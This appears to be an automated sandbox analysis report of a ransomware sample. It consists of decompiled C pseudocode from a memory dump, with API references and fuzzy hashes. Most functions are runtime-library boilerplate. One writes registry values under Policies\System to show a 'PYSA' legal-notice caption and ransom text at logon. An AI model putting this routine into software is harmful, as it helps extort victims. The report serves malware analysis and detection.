                    0x0140e219
                    0x0140e221
                    0x0140e225
                    0x0140e22a
                    0x0140e235
                    0x0140e241
                    0x0140e24d
                    0x0140e259
                    0x0140e25f
                    0x0140e263
                    0x0140e265
                    0x0140e265
                    0x00000000
                    0x0140e263
                    0x0140df8f
                    0x0140df93
                    0x0140df96
                    0x0140dfa0
                    0x0140dfb4
                    0x0140dfba
                    0x0140dfc7
                    0x0140dfde
                    0x0140dff5
                    0x0140e00c
                    0x0140e01c
                    0x0140e029
                    0x0140e040
                    0x0140e057
                    0x0140e06e
                    0x0140e088
                    0x0140e09f
                    0x0140e0b6
                    0x0140e0cd
                    0x0140e0e7
                    0x0140e0fe
                    0x0140e115
                    0x0140e12c
                    0x0140e146
                    0x0140e15d
                    0x0140e16a
                    0x0140e16b
                    0x0140e16d
                    0x0140e174
                    0x0140e18b
                    0x0140e1af
                    0x0140e1dd
                    0x0140e1f0
                    0x0140e1e1
                    0x0140e1e5
                    0x0140e1f9
                    0x00000000
                    0x00000000
                    0x0140e1fb
                    0x0140e1fd
                    0x0140e200
                    0x0140e202
                    0x0140e205
                    0x0140e1eb
                    0x0140e1ed
                    0x0140e1ef
                    0x0140e1ef
                    0x0140e1ef
                    0x0140e1e5
                    0x00000000
                    0x0140e1f5
                    0x0140e1b5
                    0x0140e1bb
                    0x0140e1c4
                    0x0140e1cd
                    0x00000000
                    0x0140e1d2
                    0x0140dfa3
                    0x0140dfac
                    0x0140df76
                    0x00000000
                    0x0140df76
                    0x0140df71
                    0x00000000
                    0x0140df71
                    0x0140df4c
                    0x00000000
                    0x0140df21
                    0x0140df21
                    0x0140df23
                    0x0140df26
                    0x0140e267
                    0x0140e267
                    0x0140e26f
                    0x0140e271
                    0x0140e271
                    0x0140e279
                    0x0140e27e
                    0x0140e282
                    0x0140e28a
                    0x0140e292
                    0x0140e298
                    0x0140e282
                    0x0140e29c
                    0x0140e2a1
                    0x0140e2a7
                    0x00000000
                    0x0140e2a7

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 28ab8c2204e0d6177ce6c549f2b2ca986ca8eccc07102bf54b9a640c77dfca98
                    • Instruction ID: 5b0109ed59cc6c2f4e251fedd115a50cf039017903b181f6baddc76cc7189ee8
                    • Opcode Fuzzy Hash: 28ab8c2204e0d6177ce6c549f2b2ca986ca8eccc07102bf54b9a640c77dfca98
                    • Instruction Fuzzy Hash: 18C144B2E40205AFDB21DBAACC81FEA77F8EB18714F14457AFA04FB2D2D67099418754
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140690D(char _a4) {
                    				char _v8;
                    
                    				_t26 = _a4;
                    				_t52 =  *_a4;
                    				if( *_a4 != 0x1423850) {
                    					E014012E1(_t52);
                    					_t26 = _a4;
                    				}
                    				E014012E1( *((intOrPtr*)(_t26 + 0x3c)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x30)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x34)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x38)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x28)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x2c)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x40)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x44)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x360)));
                    				_v8 =  &_a4;
                    				E014067D3(5,  &_v8);
                    				_v8 =  &_a4;
                    				return E01406823(4,  &_v8);
                    			}




                    0x01406913
                    0x01406916
                    0x0140691e
                    0x01406921
                    0x01406926
                    0x01406929
                    0x0140692d
                    0x01406938
                    0x01406943
                    0x0140694e
                    0x01406959
                    0x01406964
                    0x0140696f
                    0x0140697a
                    0x01406988
                    0x01406990
                    0x01406999
                    0x014069a1
                    0x014069b5

                    APIs
                    • _free.LIBCMT ref: 01406921
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140692D
                    • _free.LIBCMT ref: 01406938
                    • _free.LIBCMT ref: 01406943
                    • _free.LIBCMT ref: 0140694E
                    • _free.LIBCMT ref: 01406959
                    • _free.LIBCMT ref: 01406964
                    • _free.LIBCMT ref: 0140696F
                    • _free.LIBCMT ref: 0140697A
                    • _free.LIBCMT ref: 01406988
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 825f01080481eb1f52bba20c830756b0d5e7daa29b111302e213fb38f875e3bd
                    • Instruction ID: c441a66a86bf5389768a1edfaac626696579c9831cff1eed6ef2d5ea47681803
                    • Opcode Fuzzy Hash: 825f01080481eb1f52bba20c830756b0d5e7daa29b111302e213fb38f875e3bd
                    • Instruction Fuzzy Hash: C51177B6500109BFCB02EFD6C981CD93BA5EF34750B5140BAFA09AF6B1D631DA60DB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013C238E(void* __edx, void* __eflags) {
                    				intOrPtr* _t19;
                    				intOrPtr _t30;
                    				void* _t39;
                    				intOrPtr* _t40;
                    				void* _t42;
                    
                    				_t39 = __edx;
                    				_push(0x18);
                    				E013F26F6(E0141546E);
                    				_t30 =  *((intOrPtr*)(_t42 + 8));
                    				E013F0E3A(_t42 - 0x14, 0);
                    				_t40 =  *0x143881c; // 0xaf5b40
                    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t42 - 0x18)) = _t40;
                    				_t19 = E013C5C4E(_t30, E013C3FBC(0x1439c98));
                    				_t41 = _t19;
                    				if(_t19 == 0) {
                    					if(_t40 == 0) {
                    						_push(_t30);
                    						_push(_t42 - 0x18);
                    						__eflags = E013C5BE8(_t39) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t7 = _t42 - 0x1c;
                    							 *_t7 =  *(_t42 - 0x1c) & 0x00000000;
                    							__eflags =  *_t7;
                    							 *(_t42 - 0x20) = "bad cast";
                    							 *((intOrPtr*)(_t42 - 0x24)) = 0x141a83c;
                    							E013F4EC6(_t42 - 0x24, 0x1430c50);
                    						}
                    						_t41 =  *((intOrPtr*)(_t42 - 0x18));
                    						 *0x143881c = _t41;
                    						 *((intOrPtr*)( *_t41 + 4))();
                    						E013F13BA(__eflags, _t41);
                    					} else {
                    						_t41 = _t40;
                    					}
                    				}
                    				E013F0E92(_t42 - 0x14);
                    				return E013F26B1(_t41);
                    			}








                    0x013c238e
                    0x013c238e
                    0x013c2395
                    0x013c239a
                    0x013c23a2
                    0x013c23a7
                    0x013c23b2
                    0x013c23b6
                    0x013c23c1
                    0x013c23c6
                    0x013c23ca
                    0x013c23ce
                    0x013c23d7
                    0x013c23d8
                    0x013c23e0
                    0x013c23e3
                    0x013c23e5
                    0x013c23e5
                    0x013c23e5
                    0x013c23f2
                    0x013c23f9
                    0x013c2400
                    0x013c2400
                    0x013c2405
                    0x013c240a
                    0x013c2412
                    0x013c2416
                    0x013c23d0
                    0x013c23d0
                    0x013c23d0
                    0x013c23ce
                    0x013c241f
                    0x013c242b

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C2395
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C23A2
                      • Part of subcall function 013C3FBC: std::_Lockit::_Lockit.LIBCPMT ref: 013C3FD8
                      • Part of subcall function 013C3FBC: std::_Lockit::~_Lockit.LIBCPMT ref: 013C3FF4
                    • std::locale::_Getfacet.LIBCPMT ref: 013C23C1
                    • ctype.LIBCPMT ref: 013C23D9
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C2400
                    • std::_Facet_Register.LIBCPMT ref: 013C2416
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013C241F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prolog3_RegisterThrowctypestd::locale::_
                    • String ID: bad cast
                    • API String ID: 1257653062-3145022300
                    • Opcode ID: 3eae53f6954cff8a7562197b72c72ad618201618d34d5a438f095d662bde5c09
                    • Instruction ID: 3fd011ca3961aeaeb35840a421bdfd44316e8ebabed0e0dd2528246e5d74d5ab
                    • Opcode Fuzzy Hash: 3eae53f6954cff8a7562197b72c72ad618201618d34d5a438f095d662bde5c09
                    • Instruction Fuzzy Hash: 5E11C47190020A8BCF19EFACC440BEFB7B8BF54729F20411DE600BB291DB749D058B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013C22F0(void* __edx, void* __eflags) {
                    				intOrPtr* _t19;
                    				intOrPtr _t30;
                    				void* _t39;
                    				intOrPtr* _t40;
                    				void* _t42;
                    
                    				_t39 = __edx;
                    				_push(0x18);
                    				E013F26F6(E0141546E);
                    				_t30 =  *((intOrPtr*)(_t42 + 8));
                    				E013F0E3A(_t42 - 0x14, 0);
                    				_t40 =  *0x1438834; // 0xb01828
                    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t42 - 0x18)) = _t40;
                    				_t19 = E013C5C4E(_t30, E013C3FBC(0x1438810));
                    				_t41 = _t19;
                    				if(_t19 == 0) {
                    					if(_t40 == 0) {
                    						_push(_t30);
                    						_push(_t42 - 0x18);
                    						__eflags = E013C5B80(_t39) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t7 = _t42 - 0x1c;
                    							 *_t7 =  *(_t42 - 0x1c) & 0x00000000;
                    							__eflags =  *_t7;
                    							 *(_t42 - 0x20) = "bad cast";
                    							 *((intOrPtr*)(_t42 - 0x24)) = 0x141a83c;
                    							E013F4EC6(_t42 - 0x24, 0x1430c50);
                    						}
                    						_t41 =  *((intOrPtr*)(_t42 - 0x18));
                    						 *0x1438834 = _t41;
                    						 *((intOrPtr*)( *_t41 + 4))();
                    						E013F13BA(__eflags, _t41);
                    					} else {
                    						_t41 = _t40;
                    					}
                    				}
                    				E013F0E92(_t42 - 0x14);
                    				return E013F26B1(_t41);
                    			}








                    0x013c22f0
                    0x013c22f0
                    0x013c22f7
                    0x013c22fc
                    0x013c2304
                    0x013c2309
                    0x013c2314
                    0x013c2318
                    0x013c2323
                    0x013c2328
                    0x013c232c
                    0x013c2330
                    0x013c2339
                    0x013c233a
                    0x013c2342
                    0x013c2345
                    0x013c2347
                    0x013c2347
                    0x013c2347
                    0x013c2354
                    0x013c235b
                    0x013c2362
                    0x013c2362
                    0x013c2367
                    0x013c236c
                    0x013c2374
                    0x013c2378
                    0x013c2332
                    0x013c2332
                    0x013c2332
                    0x013c2330
                    0x013c2381
                    0x013c238d

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C22F7
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C2304
                      • Part of subcall function 013C3FBC: std::_Lockit::_Lockit.LIBCPMT ref: 013C3FD8
                      • Part of subcall function 013C3FBC: std::_Lockit::~_Lockit.LIBCPMT ref: 013C3FF4
                    • std::locale::_Getfacet.LIBCPMT ref: 013C2323
                    • codecvt.LIBCPMT ref: 013C233B
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C2362
                    • std::_Facet_Register.LIBCPMT ref: 013C2378
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013C2381
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prolog3_RegisterThrowcodecvtstd::locale::_
                    • String ID: bad cast
                    • API String ID: 2753095091-3145022300
                    • Opcode ID: 4ceb3d933cb281cfe60a6d997499e15661f8fb71e3d9d3073a21860f1bb27132
                    • Instruction ID: 01f58ad821b368336f8abd5aac04bc355ab0dec3516ba811cd0a6236eb14b8e8
                    • Opcode Fuzzy Hash: 4ceb3d933cb281cfe60a6d997499e15661f8fb71e3d9d3073a21860f1bb27132
                    • Instruction Fuzzy Hash: 3511A57190050A9BCB15EFA8C540AAF77B4BF64A28F20410DE60077291DB70DE058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E013CA06D(void* __ecx) {
                    				signed int _v8;
                    				void* _v12;
                    				void* __ebp;
                    				signed int _t9;
                    				char _t13;
                    				char* _t20;
                    				char* _t24;
                    				char* _t26;
                    				signed int _t29;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t9 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t9 ^ _t29;
                    				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 2,  &_v12);
                    				_t24 =  *0x14350bc; // 0x141bc40
                    				_t20 = _t24;
                    				_t3 =  &(_t20[1]); // 0x141bc41
                    				_t26 = _t3;
                    				do {
                    					_t13 =  *_t20;
                    					_t20 =  &(_t20[1]);
                    				} while (_t13 != 0);
                    				_t4 = _t20 - _t26 + 1; // 0x141bc42
                    				RegSetValueExA(_v12, "legalnoticetext", 0, 7, _t24, _t4);
                    				RegSetValueExA(_v12, "legalnoticecaption", 0, 7, "PYSA", 5);
                    				return E013F268B(RegCloseKey(_v12), _v8 ^ _t29);
                    			}












                    0x013ca070
                    0x013ca071
                    0x013ca072
                    0x013ca079
                    0x013ca08f
                    0x013ca095
                    0x013ca09b
                    0x013ca09d
                    0x013ca09d
                    0x013ca0a0
                    0x013ca0a0
                    0x013ca0a2
                    0x013ca0a3
                    0x013ca0af
                    0x013ca0c0
                    0x013ca0d5
                    0x013ca0ee

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000002,?), ref: 013CA08F
                    • RegSetValueExA.ADVAPI32(?,legalnoticetext,00000000,00000007,0141BC40,0141BC42), ref: 013CA0C0
                    • RegSetValueExA.ADVAPI32(?,legalnoticecaption,00000000,00000007,PYSA,00000005), ref: 013CA0D5
                    • RegCloseKey.ADVAPI32(?), ref: 013CA0DA
                    Strings
                    • legalnoticecaption, xrefs: 013CA0CD
                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 013CA085
                    • legalnoticetext, xrefs: 013CA0B8
                    • PYSA, xrefs: 013CA0C4
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Value$CloseOpen
                    • String ID: PYSA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$legalnoticecaption$legalnoticetext
                    • API String ID: 3241186055-1127495653
                    • Opcode ID: 509387f8530d929cf7ef29e7b62821c573c5f1226ef92579575f4b0e58078b1f
                    • Instruction ID: f667e2a2fa162952ca8fd70b2ba8639bbe39bf2fbbf00e8af2bdfe82bd1f4441
                    • Opcode Fuzzy Hash: 509387f8530d929cf7ef29e7b62821c573c5f1226ef92579575f4b0e58078b1f
                    • Instruction Fuzzy Hash: C0018470A80218FBDB209F54DC46FBDBF69EB04B04F20419EF9097B1A5C6B26A058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0140D461(signed int _a4, signed int _a8) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				signed char _v5;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v44;
                    				void* __ebx;
                    				void* __esi;
                    				signed int _t58;
                    				signed int _t61;
                    				signed int _t62;
                    				signed int _t64;
                    				signed int _t65;
                    				signed int _t68;
                    				signed int _t69;
                    				signed int _t73;
                    				signed int* _t75;
                    				signed int _t82;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t98;
                    				intOrPtr* _t99;
                    				signed int _t108;
                    				signed int _t109;
                    				signed int _t111;
                    				signed int _t112;
                    				intOrPtr _t115;
                    				void* _t119;
                    				signed int _t121;
                    				void* _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t131;
                    				intOrPtr* _t135;
                    				signed int _t139;
                    				signed int _t141;
                    				void* _t142;
                    				void* _t143;
                    				signed int _t144;
                    				signed int _t146;
                    				signed int* _t147;
                    				signed int _t152;
                    				signed int _t153;
                    				CHAR* _t154;
                    				signed int _t155;
                    				signed int* _t156;
                    				signed int _t157;
                    				signed int _t159;
                    				void* _t164;
                    				void* _t166;
                    				void* _t167;
                    
                    				_t111 = _a4;
                    				if(_t111 != 0) {
                    					_t144 = _t111;
                    					_t58 = E014151A0(_t111, 0x3d);
                    					_v16 = _t58;
                    					_t119 = _t143;
                    					__eflags = _t58;
                    					if(_t58 == 0) {
                    						L10:
                    						 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    						goto L11;
                    					} else {
                    						__eflags = _t58 - _t111;
                    						if(_t58 == _t111) {
                    							goto L10;
                    						} else {
                    							__eflags =  *((char*)(_t58 + 1));
                    							_t152 =  *0x143a610; // 0xaee848
                    							_t62 = _t58 & 0xffffff00 |  *((char*)(_t58 + 1)) == 0x00000000;
                    							_v5 = _t62;
                    							__eflags = _t152 -  *0x143a61c; // 0xaee848
                    							if(__eflags == 0) {
                    								L44();
                    								_t152 = _t62;
                    								_t62 = _v5;
                    								_t119 = _t152;
                    								 *0x143a610 = _t152;
                    							}
                    							_t112 = 0;
                    							__eflags = _t152;
                    							if(_t152 != 0) {
                    								L21:
                    								_t121 = _t144;
                    								_t64 = _v16 - _t121;
                    								_push(_t64);
                    								_push(_t121);
                    								L61();
                    								_v12 = _t64;
                    								__eflags = _t64;
                    								if(_t64 < 0) {
                    									L29:
                    									__eflags = _v5 - _t112;
                    									if(_v5 != _t112) {
                    										goto L12;
                    									} else {
                    										_t65 =  ~_t64;
                    										_v12 = _t65;
                    										_t27 = _t65 + 2; // 0x2
                    										_t124 = _t27;
                    										__eflags = _t124 - _t65;
                    										if(_t124 < _t65) {
                    											goto L11;
                    										} else {
                    											__eflags = _t124 - 0x3fffffff;
                    											if(_t124 >= 0x3fffffff) {
                    												goto L11;
                    											} else {
                    												_push(4);
                    												_push(_t124);
                    												_t153 = E0140D7AC(_t152);
                    												E014012E1(_t112);
                    												_t166 = _t166 + 0x10;
                    												__eflags = _t153;
                    												if(_t153 == 0) {
                    													goto L11;
                    												} else {
                    													_t125 = _v12;
                    													_t144 = _t112;
                    													_t68 = _a4;
                    													 *(_t153 + _t125 * 4) = _t68;
                    													 *(_t153 + 4 + _t125 * 4) = _t112;
                    													goto L34;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags =  *_t152 - _t112;
                    									if( *_t152 == _t112) {
                    										goto L29;
                    									} else {
                    										E014012E1( *((intOrPtr*)(_t152 + _t64 * 4)));
                    										_t141 = _v12;
                    										__eflags = _v5 - _t112;
                    										if(_v5 != _t112) {
                    											while(1) {
                    												__eflags =  *(_t152 + _t141 * 4) - _t112;
                    												if( *(_t152 + _t141 * 4) == _t112) {
                    													break;
                    												}
                    												 *(_t152 + _t141 * 4) =  *(_t152 + 4 + _t141 * 4);
                    												_t141 = _t141 + 1;
                    												__eflags = _t141;
                    											}
                    											_push(4);
                    											_push(_t141);
                    											_t153 = E0140D7AC(_t152);
                    											E014012E1(_t112);
                    											_t166 = _t166 + 0x10;
                    											_t68 = _t144;
                    											__eflags = _t153;
                    											if(_t153 != 0) {
                    												L34:
                    												 *0x143a610 = _t153;
                    											}
                    										} else {
                    											_t68 = _a4;
                    											_t144 = _t112;
                    											 *(_t152 + _t141 * 4) = _t68;
                    										}
                    										__eflags = _a8 - _t112;
                    										if(_a8 == _t112) {
                    											goto L12;
                    										} else {
                    											_t126 = _t68;
                    											_t142 = _t126 + 1;
                    											do {
                    												_t69 =  *_t126;
                    												_t126 = _t126 + 1;
                    												__eflags = _t69;
                    											} while (_t69 != 0);
                    											_v12 = _t126 - _t142 + 2;
                    											_t154 = E014009B2(_t126 - _t142, _t126 - _t142 + 2, 1);
                    											_pop(_t129);
                    											__eflags = _t154;
                    											if(_t154 == 0) {
                    												L42:
                    												E014012E1(_t154);
                    												goto L12;
                    											} else {
                    												_t73 = E01405C86(_t154, _v12, _a4);
                    												_t167 = _t166 + 0xc;
                    												__eflags = _t73;
                    												if(_t73 != 0) {
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													_push(_t112);
                    													E013FDA8E();
                    													asm("int3");
                    													_t164 = _t167;
                    													_push(_t144);
                    													_t146 = _v44;
                    													__eflags = _t146;
                    													if(_t146 != 0) {
                    														_t131 = 0;
                    														_t75 = _t146;
                    														__eflags =  *_t146;
                    														if( *_t146 != 0) {
                    															do {
                    																_t75 =  &(_t75[1]);
                    																_t131 = _t131 + 1;
                    																__eflags =  *_t75;
                    															} while ( *_t75 != 0);
                    														}
                    														_push(_t154);
                    														_t47 = _t131 + 1; // 0x2
                    														_t155 = E014009B2(_t131, _t47, 4);
                    														__eflags = _t155;
                    														if(_t155 == 0) {
                    															L59:
                    															E01401369(_t112, _t142, _t155);
                    															goto L60;
                    														} else {
                    															__eflags =  *_t146;
                    															if( *_t146 == 0) {
                    																L57:
                    																E014012E1(0);
                    																_t86 = _t155;
                    																goto L58;
                    															} else {
                    																_push(_t112);
                    																_t112 = _t155 - _t146;
                    																__eflags = _t112;
                    																do {
                    																	_t135 =  *_t146;
                    																	_t48 = _t135 + 1; // 0x5
                    																	_t142 = _t48;
                    																	do {
                    																		_t87 =  *_t135;
                    																		_t135 = _t135 + 1;
                    																		__eflags = _t87;
                    																	} while (_t87 != 0);
                    																	_t49 = _t135 - _t142 + 1; // 0x6
                    																	_v12 = _t49;
                    																	 *(_t112 + _t146) = E014009B2(_t135 - _t142, _t49, 1);
                    																	E014012E1(0);
                    																	_t167 = _t167 + 0xc;
                    																	__eflags =  *(_t112 + _t146);
                    																	if( *(_t112 + _t146) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t91 = E01405C86( *(_t112 + _t146), _v12,  *_t146);
                    																		_t167 = _t167 + 0xc;
                    																		__eflags = _t91;
                    																		if(_t91 != 0) {
                    																			L60:
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			_push(0);
                    																			E013FDA8E();
                    																			asm("int3");
                    																			_push(_t164);
                    																			_push(_t112);
                    																			_push(_t155);
                    																			_push(_t146);
                    																			_t147 =  *0x143a610; // 0xaee848
                    																			_t156 = _t147;
                    																			__eflags =  *_t147;
                    																			if( *_t147 == 0) {
                    																				L67:
                    																				_t157 = _t156 - _t147;
                    																				__eflags = _t157;
                    																				_t159 =  ~(_t157 >> 2);
                    																			} else {
                    																				_t115 = _v0;
                    																				do {
                    																					_t82 = E01414113(_v4,  *_t156, _t115);
                    																					_t167 = _t167 + 0xc;
                    																					__eflags = _t82;
                    																					if(_t82 != 0) {
                    																						goto L66;
                    																					} else {
                    																						_t84 =  *((intOrPtr*)(_t115 +  *_t156));
                    																						__eflags = _t84 - 0x3d;
                    																						if(_t84 == 0x3d) {
                    																							L69:
                    																							_t159 = _t156 - _t147 >> 2;
                    																						} else {
                    																							__eflags = _t84;
                    																							if(_t84 == 0) {
                    																								goto L69;
                    																							} else {
                    																								goto L66;
                    																							}
                    																						}
                    																					}
                    																					goto L68;
                    																					L66:
                    																					_t156 =  &(_t156[1]);
                    																					__eflags =  *_t156;
                    																				} while ( *_t156 != 0);
                    																				goto L67;
                    																			}
                    																			L68:
                    																			return _t159;
                    																		} else {
                    																			goto L55;
                    																		}
                    																	}
                    																	goto L70;
                    																	L55:
                    																	_t146 = _t146 + 4;
                    																	__eflags =  *_t146 - _t91;
                    																} while ( *_t146 != _t91);
                    																goto L57;
                    															}
                    														}
                    													} else {
                    														_t86 = 0;
                    														L58:
                    														return _t86;
                    													}
                    												} else {
                    													_t139 = _v16 + 1 + _t154 - _a4;
                    													asm("sbb eax, eax");
                    													 *(_t139 - 1) = _t112;
                    													_t98 = SetEnvironmentVariableA(_t154,  !( ~(_v5 & 0x000000ff)) & _t139);
                    													__eflags = _t98;
                    													if(_t98 == 0) {
                    														_t99 = E013FDB3A();
                    														_t112 = _t112 | 0xffffffff;
                    														__eflags = _t112;
                    														 *_t99 = 0x2a;
                    													}
                    													goto L42;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							} else {
                    								__eflags = _a8;
                    								if(_a8 == 0) {
                    									L14:
                    									__eflags = _t62;
                    									if(_t62 == 0) {
                    										 *0x143a610 = E014009B2(_t119, 1, 4);
                    										E014012E1(_t112);
                    										_t152 =  *0x143a610; // 0xaee848
                    										_t166 = _t166 + 0xc;
                    										__eflags = _t152;
                    										if(_t152 == 0) {
                    											goto L11;
                    										} else {
                    											__eflags =  *0x143a614 - _t112; // 0x0
                    											if(__eflags != 0) {
                    												goto L20;
                    											} else {
                    												 *0x143a614 = E014009B2(_t119, 1, 4);
                    												E014012E1(_t112);
                    												_t166 = _t166 + 0xc;
                    												__eflags =  *0x143a614 - _t112; // 0x0
                    												if(__eflags == 0) {
                    													goto L11;
                    												} else {
                    													goto L19;
                    												}
                    											}
                    										}
                    									} else {
                    										_t112 = 0;
                    										goto L12;
                    									}
                    								} else {
                    									__eflags =  *0x143a614 - _t112; // 0x0
                    									if(__eflags == 0) {
                    										goto L14;
                    									} else {
                    										_t108 = L01403B78(0);
                    										__eflags = _t108;
                    										if(_t108 != 0) {
                    											L19:
                    											_t152 =  *0x143a610; // 0xaee848
                    											L20:
                    											__eflags = _t152;
                    											if(_t152 == 0) {
                    												L11:
                    												_t112 = _t111 | 0xffffffff;
                    												__eflags = _t112;
                    												L12:
                    												E014012E1(_t144);
                    												_t61 = _t112;
                    												goto L13;
                    											} else {
                    												goto L21;
                    											}
                    										} else {
                    											goto L10;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t109 = E013FDB3A();
                    					 *_t109 = 0x16;
                    					_t61 = _t109 | 0xffffffff;
                    					L13:
                    					return _t61;
                    				}
                    				L70:
                    			}
























































